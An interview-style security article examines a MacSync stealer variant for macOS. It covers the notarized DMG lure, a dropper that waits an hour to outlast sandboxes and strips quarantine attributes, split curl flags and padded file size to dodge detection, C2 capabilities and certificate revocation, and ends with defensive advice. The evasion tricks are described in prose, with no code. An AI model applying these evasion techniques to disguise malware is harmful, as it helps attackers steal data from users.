With the macOS threat landscape evolving at a breakneck pace, we sat down with Rupert Marais, our in-house security specialist, to dissect a new and particularly deceptive malware strain. This new variant of the MacSync stealer highlights a worrying trend where attackers are successfully using Apple’s own trust mechanisms against it. In our discussion, Rupert unpacks the malware’s contradictory infection process, details its clever evasion techniques, and explains the broader strategic implications of its command-and-control capabilities. He also sheds light on the perpetual cat-and-mouse game between Apple and cybercriminals over code-signing certificates.
The article states this MacSync variant used a signed, notarized app to bypass Gatekeeper but still prompted users to right-click and open it. Could you explain this apparent contradiction and walk us through the step-by-step process of how this particular malware gets from the DMG to execution?
It’s a fascinating bit of psychological manipulation layered on top of a technical bypass. On the surface, it seems redundant. The whole point of getting an app signed and notarized by Apple is to have it run seamlessly without Gatekeeper raising an alarm. But by still including the “right-click to open” instruction—a classic workaround for unsigned apps—the attackers are playing a dual game. It acts as a fallback and, more insidiously, it normalizes suspicious user behavior. The process begins when a user downloads the disk image, named something like “zk-call-messenger-installer-3.9.2-lts.dmg.” Inside is the notarized app, which the Swift-based dropper then executes. From there, it gets patient. It checks for an internet connection, then deliberately waits for about 3600 seconds—an hour—to outlast many automated sandbox analysis environments. After its wait, it strips the file’s quarantine attributes and uses a specially crafted command to fetch and execute the final, encoded MacSync payload.
Researchers noted unique evasion tactics, like changing curl command flags and inflating the DMG file size to 25.5 MB with PDFs. Based on your experience, how do these specific changes help evade detection, and can you provide other examples of clever evasion techniques you’re seeing?
These tactics are all about avoiding automated security systems by breaking established patterns. Security software often hunts for signatures, and the curl -fsSL command is a textbook indicator for downloading and running a malicious script. By splitting the flags into -fL and -sS and adding other options, the attackers make the command look just different enough to slide past simplistic signature-based detection. It’s subtle, but effective. The file inflation technique is even more low-tech but brilliant in its own way. Many automated analysis tools have file size limits to manage resources. A tiny, suspicious installer gets immediate scrutiny. But a 25.5 MB file bloated with unrelated PDFs seems more like a legitimate, albeit poorly packaged, application. This can cause scanners to either time out or skip it entirely. We’re seeing this philosophy elsewhere; for instance, attackers behind the Odyssey stealer have been wrapping their malware in signed DMGs that impersonate well-known software like Google Meet, leveraging brand trust as another layer of evasion.
The payload is identified as MacSync, a Go-based agent with command-and-control capabilities. Beyond simple data theft, could you elaborate on the specific C2 functions this agent enables and how its capabilities compare to other macOS stealers like Odyssey or DigitStealer?
This is what truly elevates MacSync from a simple pest to a strategic threat. A standard information stealer, like many we see, is essentially a smash-and-grab tool. It gets in, collects credentials, browser data, or crypto wallets, sends the data home, and its job is mostly done. But MacSync is described as a “fully-featured Go-based agent” with remote command-and-control, or C2, capabilities. This changes the entire dynamic. Instead of a one-time data heist, the attackers establish a persistent foothold on the victim’s Mac. Imagine a thief who not only steals your wallet but also leaves behind a hidden microphone and a key to your front door. The C2 server allows them to send new commands, deploy additional malware, spy on the user in real-time, or use the infected machine as a pivot point to attack other systems on the network. This makes it far more dangerous and versatile than stealers like Odyssey or DigitStealer, which are typically focused on the initial data grab.
This attack is part of a trend where attackers use signed executables, but Apple quickly revoked the certificate. Can you describe the typical cat-and-mouse game between threat actors obtaining these certificates and Apple revoking them? How much of a setback is a single revocation for a campaign?
It’s a relentless cycle, and one of the central battlegrounds for macOS security. Threat actors go to great lengths to obtain Apple developer certificates, either by creating fraudulent developer accounts or by compromising legitimate ones. With that certificate, they can sign their malware, giving it a stamp of legitimacy that allows it to bypass Gatekeeper. For a while, their campaign runs smoothly. But eventually, security researchers or Apple’s internal systems will flag the signed application as malicious. Once confirmed, Apple revokes the certificate. A revocation is a sharp, immediate blow to that specific malware variant. The installer is effectively dead in the water; Gatekeeper will block it on sight. However, for a sophisticated attacker, it’s merely an operational cost. They likely have other certificates ready to go or are already in the process of acquiring new ones. It forces them to re-tool and re-deploy, but it rarely stops the overall campaign.
Do you have any advice for our readers?
Absolutely. The most critical lesson from this MacSync variant is that a developer signature or notarization is not an infallible mark of safety. Threat actors are actively abusing this trust system. Therefore, maintain a healthy dose of skepticism. If you download an application and it asks you to perform unusual steps to run it, like right-clicking and selecting “Open” from the menu, stop immediately. That is a massive red flag. Legitimate, properly signed software should not require such workarounds. Stick to downloading applications from the official Mac App Store or directly from the developer’s verified website. The fact that this malware even exists proves that relying solely on built-in protections isn’t enough. A layered defense, including a reputable third-party endpoint security solution, is essential for catching what slips through the cracks.
